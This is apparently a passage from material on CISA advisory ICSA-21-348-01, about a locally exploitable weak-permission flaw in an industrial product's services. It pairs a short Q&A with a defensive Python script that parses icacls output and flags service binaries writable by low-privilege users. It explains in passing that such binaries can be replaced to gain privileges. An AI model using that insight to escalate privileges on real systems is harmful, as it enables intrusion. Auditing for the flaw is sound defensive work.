CISA ICS advisory ICSA-21-348-01


Q & A

Can this vulnerability be exploited remotely?

No. This vulnerability can be exploited locally. The attacker should have authentication credentials and successfully authenticate on the system.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.
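
The three permission issues above are the same finding on three services: the installer leaves a file that a privileged service executes writable by ordinary users. The check below is added here and is not vendor code; the paths and the `icacls` output it parses are constructed for the example, and the set of low-privilege principals is an assumption to adjust per environment. It parses the ACL listing that `icacls <file>` prints for a service binary and reports any allow entry that gives Users, Authenticated Users or Everyone a right that can change the file.

```python
import re

# Principals that must never be able to change a service binary (assumed set;
# add domain groups for your environment).
LOW_PRIV_PRINCIPALS = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users", "Everyone"}
# icacls simple and specific rights that allow altering the file or its ACL.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "DC", "WDAC", "WO"}
# Inheritance markers icacls prints alongside the rights; not rights themselves.
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

ACE_RE = re.compile(r"^\s*(?P<who>.+?):(?P<flags>(?:\([^)]*\))+)\s*$")


def parse_ace(text):
    """'BUILTIN\\Users:(I)(M)' -> ('BUILTIN\\Users', {'M'}, deny=False)."""
    m = ACE_RE.match(text)
    if not m:
        return None
    tokens = set()
    for group in re.findall(r"\(([^)]*)\)", m.group("flags")):
        tokens.update(t.strip() for t in group.split(","))
    deny = "DENY" in tokens            # icacls marks deny entries with (DENY)
    rights = tokens - INHERITANCE_FLAGS - {"DENY"}
    return m.group("who").strip(), rights, deny


def parse_icacls(path, output):
    """Parse the text printed by `icacls <path>`; the first ACE shares a line with the path."""
    aces = []
    for line in output.splitlines():
        if line.startswith(path):
            line = line[len(path):]
        if not line.strip() or line.lstrip().startswith("Successfully processed"):
            continue
        ace = parse_ace(line)
        if ace:
            aces.append(ace)
    return aces


def writable_by_low_priv(aces):
    """Low-privilege principals holding an allow entry with a write-class right."""
    return sorted(who for who, rights, deny in aces
                  if not deny and who in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS)


def check_service_binary(service, path, icacls_output):
    weak = writable_by_low_priv(parse_icacls(path, icacls_output))
    return {"service": service, "path": path, "writable_by": weak, "finding": bool(weak)}


# Constructed sample output in the format icacls prints; the paths are hypothetical.
BAD_PATH = r"C:\Program Files\ExampleMonitor\Apache\bin\httpd.exe"
BAD_OUTPUT = r"""C:\Program Files\ExampleMonitor\Apache\bin\httpd.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                      BUILTIN\Administrators:(I)(F)
                                                      BUILTIN\Users:(I)(M)
                                                      Everyone:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
GOOD_PATH = r"C:\Program Files\ExampleMonitor\mysql\bin\mysqld.exe"
GOOD_OUTPUT = r"""C:\Program Files\ExampleMonitor\mysql\bin\mysqld.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                     BUILTIN\Administrators:(I)(F)
                                                     BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for svc, path, out in (("Apache2.2", BAD_PATH, BAD_OUTPUT), ("mysql", GOOD_PATH, GOOD_OUTPUT)):
        print(check_service_binary(svc, path, out))
```

To run it against a real host, list services with `Get-CimInstance Win32_Service | Select-Object Name, PathName` in PowerShell, strip the quotes and arguments from each PathName, capture `icacls` for the file, and pass the text to `check_service_binary`. The check looks only at the binary's own ACL; a writable parent directory is an equivalent finding, since the file can then be renamed and replaced, so run the same check on the directory as well.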


